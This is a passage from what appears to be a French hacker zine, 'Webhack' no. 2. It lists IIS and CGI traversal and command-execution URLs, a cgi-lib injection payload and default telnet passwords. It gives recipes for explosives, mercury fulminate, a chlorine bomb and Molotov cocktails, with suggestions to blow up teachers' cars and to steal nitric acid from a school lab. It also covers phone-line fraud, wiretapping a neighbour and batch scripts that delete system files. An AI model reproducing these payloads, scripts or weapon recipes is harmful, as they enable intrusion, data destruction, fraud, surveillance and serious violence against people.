http://www.company.com/scripts/tools/getdrvrs.exe
http://www.site.com/scripts/file.ext%20.pl
http://www.site.com/scripts/pass.txt%20.pl
http://www.site.com/scripts/default.asp%20.pl
http://www.site.com/scripts/*.txt%20.pl
http://somewhere/something.asp::$DATA
http://www.domain.com/..\..
http://www.domain.com/scripts..\..\scriptname
http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat
http://your.host.name/scripts/anyold.cmd?&dir+c:\
http://your.host.name/scripts/anyold.bat?&dir+c:\
http://your.host.name/..\..\autoexec.bat
http://your.host.name/scripts/../../../winnt35/win.ini
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+set
http://your.host.name/scripts/..\..\winnt35\cmd.exe?%2FC+echo+"Hi
There"+>c:\temp\hello.txt
http://your.host.name/scripts/..\..\WINNT35\SYSTEM32\XCOPY.EXE?+c:\autoexec.bat+c:\temp
http://victim.com/scripts/convert.bas?../../anything/you/want/to/view 

Telnet host.com 80:
GET ../..


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
**************************9. CHANGER SON NOM DE DOMAINE ET AUTRES...*****************************
*************************************************************************************************

Changer son nom de domaine:
---------------------------

Editer le fichier /etc/hosts et inscrire le nom du domaine desire.
edite /etc/sysconfig/network
et tapez hostname -v pour creer le domaine    -> a faire en root uniquement !

Des truc en perl
----------------
faille pour le module cgi-lib

rajoutez:?%0a/bin/ls%20-la%20/usr/src/include au script .pl

<shell>echo  *
Meme fonction que le test cgi sous le bash..

Telnet
------
Quelque liste de password qui donne un shell, marchant sur les vieux serveurs (on sais jamais)

sys
bin
trouble
daemon
uucp
nuucp  
rje
lp
adm


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
*******************************10. COPIER DES VIDEOS PROTEGEE...**********************************
*************************************************************************************************

Macrovison est un procédé qui permet d'empécher la copie de cassette vidéo . 
Il rend le signal vidéo de la copie mauvais en rajoutant des images pleines d'interferences 
et il rend la copie moins nette . 
Il existe depuis bien longtemps un système pour copier les cassettes qui consistait a faire 
passer le signal original dans la télévison et de le renvoyer sur le 2eme magnétoscope mais 
malheureusement tout le monde n'a pas 2 prises péritel dans leur TV

Maintenant il existe un petit montage qui va filtrer le signal vidéo du magnétoscope et qui 
va retirer le code macrovision .
En effet ce montage va en quelque sorte purifier la cassette vidéo de son code de protection .

Je vous fourni le shéma éléctrique, le typon et le plan d'implantation des composants ainsi 
que la nomenclature.

(Voir macroshem.jpg pour le schema ; typonmacr.jpg pour le typon et nomemacr.jpg pour la nomenclature)

Ce Plan et ce Typon sont extrait de électronique et loisirs numéro 3 . 
Vous pouvez bien entendu commander le Kit complet de ce décodeur chez comelec a aubagne .
Me maillez pour l'addresse . il y en pour environ 400 fr ou 61 euros


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
*******************************11. ANARCHIE, BOMBE ET AUTRES....**********************************
*************************************************************************************************

ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION========  
NE PAS FAIRE CA,CE N'EST VRAIMENT LA QUE POUR INFORMATION ET LES DELIRES SUR LES PROFS C POUR DECONNER !!
ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION*ATTENTION======== 

explosifs :

pour faire de l'explosif il y plusieurs methodes 

Fabrication d'un détonateur

Vous prenez deux fils assez long genre 15m ou plus vous prenez une resistance chauffante 
que vous soudez aux deux bouts de chaque fil .Installez un interupteur marche/arrêt entre les 
2fils et un generateur genre un clip 9V et bien sur une pile, mettez la pile et poussez 
l'interrupteur sur ON et la resistance chauffante se met à chauffer vous pouvez remplacé la 
resistance par une lampe sans le verre au dessus

Après y a plus qu'a installé le montage avec l'explosif en question

1ere méthode :

Vous prenez du chlorate de soude (desherbant) et du sucre. Il faut 50% de chlorate de soude 
et 50% de sucre ensuite vous mettez ca dans une cannette en verre et vous mettez un détonateur 
et vous fermez bien avec de la pate à modeler du petit frère.
Vous méttez votre bombe dans les cabine FT ou dans votre collège ou la voiture de vos profs 
et la !! t'a plus que a appuyer et booooooooom !!!! la voiture explose

attention

10 grammes ca fait péter une porte de maison
100 grammes une plaque de beton de 40kilosgrammes
vous imaginez une twingo...

autres explosifs :

du plastique explosif :

vous avez besoin de chlorate de potassium et de la vaseline
vous mélangez le tout 9 portions de chlorate de potassium et 1 portion de vaseline mélanger 
tout gardé ca au sec ou dans du papier comme chez les bouchers mettez ca au frais mais sec .
Quand vous en avez besoin prenez en et planté votre detonateur dedans et là boom

 

Fulminate de mercure : 
1gr de mercure a dissoudre dans 12gr. d'acide nitrique à 34°C.
Ajoutez 11gr. d'alcool à 36°C.. 
On fait chauffer le mélange au bain-marie jusqu'à production de vapeurs blanches et épaisses. 
Par le refroidissement, il se dépose une poudre blanche cristalline, qu'on lave à l'eau froide 
et qu'on séche avec précaution. Après, à vous de faire le système de détonation.

bombe au chlore

pour faire cette bombe vous avez besoin 
de lait 
du chlore en poudre
une bouteille 
Vous remplissez une bouteille a moitié de lait et vous rajoutez tout le reste en chlore vous 
fermez le bouchon et vous balancez

 

Fumigènes :

Le fumigène est très facile à faire il vous faut

1ere methode

une balle de Ping-Pong et une feuille d'aluminium
Vous envelloppez la balle dans l'alu et vous chauffez la balle en dessous

2eme methode

il faut du 
salpètre 
sucre 
eau
vous metez la moitié de chaque produit dans une casserole vous mettez de l'eau et vous faite 
cuire au bain marie .Quand le mélange est omogène vous le sortez et vous le mettez sur une 
plaque en faisant des petit d'environ 100gr et vous planter une mèche dessus 

une bombe facile à faire

Nitrocellulose

il faut 
du coton
de l'acide nitrique
vous prenez du coton que vous trempez dans de l'acide nitrique .puis vous rincer le coton 
avec de l'eau et vous faites chauffer

Cocktail Molotov

vous prenez une bouteilles en verre et vous mettez de l'alcool ensuite vous prenez un linge 
imbibé d'alcool ,vous le mettez autour de la bouteille vous faite flamber le linge et vous 
l'envoyez sur votre plus grand enemy en l'occurence ma prof de math 

Eat this and run !!!

 

Ou trouver les produits cités ici

chlorate de soude au rayon desherbant de votre magasin prix chez SUPER U 80 fr les 5kilogrammes

sucre : heu la je pense que c'est facile la !

salpètre dans des desherbants

mercure vous prenez un thermometre et vous le cassez 

acide nitrique :vous le piquez dans le labo de chimie de votre collège

balle de pingpong: rayon sport

coton: dans le rayon pharmacie


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
***************************************12. BEIGE BOXING******************************************
*************************************************************************************************

Le beige boxing est un moyen pas mal pour telephoner gratis .

En fait on a besoin d'un téléphone on coupe le fil et on soude sur les trois fil 
(rouge vert bleu) une pince croco .ensuite il suffit de trouver un commutateur Ft ou un boitier 
Anti foudre et l'ouvrir 

à l'interieur du boitier il ya plusieur ligne de telephone qui sont connecté . 
il suffit de gratter le plastique des fils d'une des ligne et mettre les pinces croco dessus 
et normalement ya une tonalité (fils rouge sur fil blanc et fil vert sur bleu) et la vous 
pouvez appeller n'importe c'est le proprio qui régale !!
(ndsnake: le proprio paiera rien car il va porter plainte donc ce sera FT qui regalera !!)

Mais je pense que comme vous ètes malin , vous pouvez trouver une application qui pourrait 
vous faire gagner un max de thune ! Mais il faut quand même investir un minimum dans un 
portable avec un modem et un emul minitel paske comme vous payez pas les communications 
vous pouvez appeller les 3617 dépense bien pognon 5.57fr la minute pour recuperer du matos 
informatique comme des cartes mères , camera, modem, disque dur. Vous recuperez le matos et 
vous le revendez à 50% -cher que le prix réel à des Lamerz


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
****************************************13. BLACK BOX********************************************
*************************************************************************************************

C'est quoi ?

La black box est un moyen très pratique pour que vos correspondant ne payent pas les 
communications.
En faite elle fait croire au central de Farce Télécom (ou d'un autre opérateur) que quand on 
vous appelle vous ne décrochez pas le phone . Total ça fait croire à Ft que personne à décroché

Mais c'est quand même louche un phone qui sonne pendant 4 heures ? me demande t-on .

Oui parce que Ft n'est pas si bête que ca il ont un systeme qui note le nO du corespondant et 
de l'appelant seulement dans les très grandes villes francaises mais on peut quand même phoner 
gratis pendant 4 min grand max en ville et 10 a 20 min à la campagne .

Comment ça fonctionne ?

En fait c'est une résistance de 1.8K ohm qui fait croire a Ft que vous avez pas encore décroché .
 Il suffit de branché sur un des fils du phone une resistance et une LED entre. j'ai réalisé un 
shéma et même un Typon très simple

NOMENCLATURE

- d'un téléphone.
- d'une résistance de 1,8 kohms de 0,5 Watts.
- d'un interrupteur.
- d'une diode de 1,5 Volts.
- d'une personne à appeler


Je pense que le Shéma est assez facile a comprendre (voir blackbox.jpg)

Je vous conseille d'installer la black box sur une rallonge de téléphone ca evite de tous casser


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
****************************************14. ECOUTE TELEPHONIQUE********************************************
*************************************************************************************************

Comment écouter la ligne téléphonique du voisin et l'enregistrer ?

En fait nous allons associer deux Box, une pour écouter et une autre pour enregistrer

Les boxes en question sont la beige box et spy box 

explication

- quatres fils téléphoniques.
- un cordon jack pour guitare (soit 2 prises jacks).
- un fer à souder.
- un téléphone.
- un pc ou un magnétophone. 

Ouvrez le combiné du téléphone, vous devriez voir deux pointes de soudure sur le micro et 
deux pointes aussi sur l'écouteur . Maintenant arrachez les prises jacks du cordon et dévissez 
les . Vous devriez voir un des fils electrique du jack soudé sur une petite tige et un autre sur 
une longue tige.Prenez deux fils téléphoniques et soudez les du micro jusqu'a l'une des prises 
jack et les deux autres de l'écouteur à l'autre jack.

vous avez donc une Spy box


----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------

*************************************************************************************************
**************************************15. VIRII FACILES******************************************
*************************************************************************************************

Comment créer un programme qui fout le bordel sur une machine ?

 

Tout d'abord il faut définir nos besoin 
on veut empecher le demarage de la machine 
on veut renommer des fichiers

Pour empecher le demarage d'une machine sous windows il suffit d'effacer ou de le renommer un 
fichier dos comme command.com ou autoexec.bat 

la syntaxe est très simple

couper ici

programme qui renomme les fichiers systemes

-----------------------------------

@echo off

echo " FUCK OFF! "

ren c:\*.com *.txt

ren c:\*.bat *.txt 

ren c:\*.sys *.pas

exit


------------------------------------

couper ici

programme qui efface les fichiers systemes

------------------------------------

@echo off

del c:\*.com

del c:\*.bat

del c:\*.sys

------------------------------------

couper ici

(ndSnake : oui mais ca il suffise que l'on s'y connaisse 1 peu et on le decouvre... par contre 
la solution pour cacher ca serai de compiler ces fichiers en *.com, impossible ? he bien non !
avec un simple petit fichier c possible ! je ne vous donnerai pas ce fichier car ca ferai trop 
de degats par ma faute mais sachez qu'il existe et que je l'ai ! donc cherchez...
enfin sachez que lorsque la rubrique programation sera sur le site j'y mettrai un compileur 
qbasic et... *.bat ! donc patientez ou cherchez !!)
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------


                                GREETZZZZZZZZz

Madchat pour la publication du zine, Taz pour mettre Webhack dans ses liens,
Tous ceux qui ont mit webhack dans leurs liens, Tout ceux qui lisent ce zine, 
DOCKY99 Et Putois pour leurs articles, Et enfin tt la scene underground Francophone !



----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------


                                 FIN DU NUMERO

Donc voila c'est "deja" la fin du N°2 mailleur que le 1 nan ? Mais on recherche de plus en plus 
d'articles, alors n'hesitez pas a en envoyer , le prochain numero n'en serai que meilleur !!! 

WEBHACK : http://webhack2000.cjb.net  
          webhack@ifrance.com

@+++

Solid Snake .

PS : pour mettre la banniere webhack sur votre site veullez utiliser ce code en HTML merci :o)

<p align="center"><a href="http://webhack2000.cjb.net/" target="_blank">
<img src="http://hack2000.ctw.cc/webhack-ban.gif" alt="WEBHACK" border="0">
</a></p>


si vous voulez faire des echanges de banniere gratuitement contactez webhack : webhack@ifrance.com
